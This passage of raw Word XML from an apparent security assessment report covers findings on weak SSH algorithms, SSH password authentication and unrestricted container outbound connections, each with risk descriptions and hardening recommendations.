              <w:t>To fix weak SSH ciphers, Kex, and MAC algorithms, the following steps should be taken:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EDFEA68" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"Upgrade to the latest version of SSH, which supports strong ciphers, Kex, and MAC algorithms.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F308A1E" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"Disable weak SSH ciphers, Kex, and MAC algorithms. To do this, the SSH configuration file should be modified to remove any weak algorithms and enable only the strong ones.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="042FA826" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"Monitor SSH traffic for any suspicious activity, such as unauthorized logins, unusual login patterns, and excessive failed login attempts.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33526809" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"Implement two-factor authentication to enhance the security of the SSH connection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45B18E0F" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="00B25578">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId37" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=194310">
        <w:bookmarkStart w:id="26" w:name="_Toc199711438"/>
        <w:bookmarkStart w:id="27" w:name="_Toc200562840"/>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:sz w:val="36"/>
          </w:rPr>
          <w:t>194310: SSH Password-based Authentication Enabled</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="C1BABA"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Informational)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>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1B93A33C" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47A3AFE3" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D9F7A85" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>SSH (Secure Shell) is a protocol used for secure remote access to servers and other network devices. SSH password-based authentication involves logging in to a remote system by providing a username and password. While this method of authentication is simple and easy to use, it is also vulnerable to various security risks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A2C1F1A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29B1F9BF" w14:textId="77777777" w:rsidR="00B25578" w:rsidRPr="0025219A" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0025219A">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">References: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BC6CAF0" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://www.cyberciti.biz/tips/linux-unix-bsd-openssh-server-best-practices.html</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="046415A9" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>https://www.servers.com/support/knowledge/linux-administration/how-to-replace-password-based-ssh-authentication-with-key-based</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E9F97EA" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:jc w:val="distribute"/>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A46199F" wp14:editId="73B353E2">
                  <wp:extent cx="5929401" cy="365760"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="8" name="Drawing 8" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 8" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId38"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6070394" cy="374457"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="21EE7789" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09E9E342" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Affected IP(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CBFFFC4" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>9.114.12.79</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CC3E32A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>9.114.12.78</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="76BD0ABF" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="546C7BDD" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Impact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60D8B6DC" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Using SSH password-based authentication presents several security risks, including:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74EBED23" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"Brute force attacks: Attackers can use automated tools to guess or crack weak passwords, leading to unauthorized access to the system.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19F5420A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"Password reuse: If users reuse the same password across multiple accounts, a compromise of one account can lead to the compromise of others.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70F349E1" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"Password sniffing: Passwords transmitted in plain text can be intercepted and stolen by attackers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40662B2F" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"Social engineering attacks: Attackers can trick users into revealing their passwords through phishing emails or other forms of social engineering.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A937A06" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"Insider threats: Malicious insiders with authorized access to the system can abuse their privileges to gain unauthorized access to other systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="16F7F02F" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D524808" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Fix Recommendation / Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68A2447A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>To mitigate the risks associated with SSH password-based authentication, it is recommended to:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3429F9E7" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"Use SSH key-based authentication: SSH key-based authentication involves generating a public-private key pair on the client system, and then copying the public key to the remote system. This allows the client system to log in to the remote system without the need for a password. The private key should be kept secure on the client system and should not be shared with anyone.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4964D6E1" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"Disable password authentication: Disable SSH password-based authentication altogether and only allow SSH key-based authentication. This prevents attackers from attempting to guess or crack passwords.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C9445E9" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">"Disable root login: Disable the ability to log in directly as the root user. This can help prevent </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>attackers from gaining root access to your system if they are able to guess or crack a password.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F4AE31F" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"Use a firewall: Configure a firewall to restrict access to the SSH service only to trusted IP addresses. This helps to prevent attackers from accessing the SSH service from unauthorized locations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40C5FF56" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="00B25578">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc199711439"/>
      <w:bookmarkStart w:id="29" w:name="_Toc200562841"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0077B3"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Container/PODs Security Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="06E14BEE" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="00B25578">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=193926">
        <w:bookmarkStart w:id="30" w:name="_Toc199711440"/>
        <w:bookmarkStart w:id="31" w:name="_Toc200562842"/>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:sz w:val="36"/>
          </w:rPr>
          <w:t>193926: Unrestricted Internet Access/Outbound Connections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FDC20A"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Medium)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>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3360843B" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C2A9A18" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="596639C6" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Containers running critical or confidential applications and components should have a restricted external communication. Upon compromise of these container attacker would be able to exfiltrate/transfer files to (public external networks) and from container without any restrictions. Proper  policies should be configured in either container or HOST level.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41C33D77" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A19E494" w14:textId="77777777" w:rsidR="00B25578" w:rsidRPr="000A0DCF" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000A0DCF">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E63069D" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://docs.docker.com/network/iptables/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="480190D2" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F1DB5AE" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">It was observed that there are no restriction on outbound connections in containers, in other words untrusted network/internet access should be blocked or preferably whitelisting should be used. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31CFDBE8" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">    Note: We were able to download a file to a public server due to unrestricted communication    from the container.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E342B53" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70A2EFD6" w14:textId="7A9FDBAF" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="000A0DCF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">     Please refer below screen shot:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D7D058" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="00EF2706">
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="704A6F22" wp14:editId="66F60417">
                  <wp:extent cx="5930900" cy="3252084"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="10" name="Drawing 10" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 10" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId40"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5933025" cy="3253249"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EF6C05B" wp14:editId="5758F966">
                  <wp:extent cx="5930900" cy="3387256"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="11" name="Drawing 11" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 11" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId41"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5938515" cy="3391605"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06FC2291" wp14:editId="27D5ACBA">
                  <wp:extent cx="5927840" cy="795131"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="9" name="Drawing 9" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 9" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId42"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5996504" cy="804341"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
